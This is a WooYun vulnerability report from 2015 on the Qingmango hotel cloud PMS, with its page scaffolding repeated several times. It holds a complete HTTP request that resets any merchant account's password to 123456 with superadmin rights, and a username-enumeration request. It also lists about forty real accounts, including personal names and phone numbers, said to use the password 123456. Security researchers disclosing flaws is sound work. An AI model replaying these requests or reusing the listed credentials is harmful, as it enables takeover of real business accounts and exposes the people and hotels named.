青芒果酒店云PMS任意用户密码重置及1900个商家弱口令

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121256

漏洞标题：青芒果酒店云PMS任意用户密码重置及1900个商家弱口令

漏洞作者： farmer

提交时间：2015-06-17 21:44

修复时间：2015-09-20 21:47

公开时间：2015-09-20 21:47

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-17：细节已通知厂商并且等待厂商处理中
2015-06-22：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2015-08-16：细节向核心白帽子及相关领域专家公开
2015-08-26：细节向普通白帽子公开
2015-09-05：细节向实习白帽子公开
2015-09-20：细节向公众公开

简要描述：

详细说明：

http://pms.qmango.com/manage/login.jsp

注册个帐号，发现修改帐号权限的功能可以遍历所有商家的用户名，及修改商家的密码。

POST /manage/shezhi/yonghu_edit.jsp HTTP/1.1
Host: pms.qmango.com
Proxy-Connection: keep-alive
Content-Length: 412
Accept: */*
Origin: http://pms.qmango.com
X-Requested-With: XMLHttpRequest
User-Agent:  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://pms.qmango.com/manage/shezhi/yonghu_edit.jsp?id=9539&waibao_id=14&loupan_id=11648
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie:  
id=2&action=editsave&waibao_id=14&loupan_id=11118&user_name=qmango1&name=qmango1&status=&password=123456&password1=123456&yuangong_id=0&login_err=0&zhekou=-1&jibie=超级管理员&flag=1001,1002,1003,1007,1005,1006,1008,2001,2002,2003,2004,2005,2006,2009,2007,2008,4006,2010,2011,3001,3002,3003,3004,4001,4007,1004,4002,4003,4004,4005,4008,4009,5001,5005,5006,5007,5008,5009,5010&logstarttime=2015-06-17 09:23:33

重置后可以正常登录，但是酒店通过这种方法设置的密码酒店未能对应上，所以看不到帐号原酒店的订单信息。
但通过刚才的功能可以获取所有商家的用户名。

GET /manage/shezhi/yonghu_edit.jsp?id=2&waibao_id=14&loupan_id=2 HTTP/1.1
Host: pms.qmango.com

遍历loupan_id,共有一万多帐号
登录时验证码可以重复使用，于是进行破解

有近2000个帐号的密码为123456

漏洞证明：

成功登录

部分密码为123456的用户
黑甜青年旅店
takeout&gt;&lt;img
青岛天惠
admintao
fxhotels
banban540606
justtak&gt;&lt;imge
22564518
q-huangqiaoling
新海岚轩客栈
58156590
霍艳丽
毕青春
renxiaomi
test0302
13811542722
bolunzhe
liuweixiong
18309909191
同创科技
buhaoji&lt;img
yanghongju
chenglili
test-前台
沙景源1
dicsonpan
168inn1Z
13337571187
fysx8715570
jingduyipu
彭桂芳
80838595
凤凰家园
蜻蜓公寓
任小米
akang158
15890194185
zrgtdjd123
test-admin
xiaocheng

修复方案：

权限控制，验证码及时过期，防破解。

版权声明：转载请注明来源 farmer@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-09-20 21:47

厂商回复：

漏洞Rank：15 (WooYun评价)

漏洞评价：

2015-08-17 09:28 | 路人毛 ( 路人 | Rank:23 漏洞数:10 | 昨晚做梦，挖到了电信都漏洞，被电信起诉了...)

我抓的某个弱口令就被忽略了。。。fuck

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121256

漏洞标题：青芒果酒店云PMS任意用户密码重置及1900个商家弱口令

相关厂商：青芒果房管家

漏洞作者： farmer

提交时间：2015-06-17 21:44

修复时间：2015-09-20 21:47

公开时间：2015-09-20 21:47

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 farmer@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121256

漏洞标题：青芒果酒店云PMS任意用户密码重置及1900个商家弱口令

相关厂商：青芒果房管家

漏洞作者： farmer

提交时间：2015-06-17 21:44

修复时间：2015-09-20 21:47

公开时间：2015-09-20 21:47

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0121256"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 farmer@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：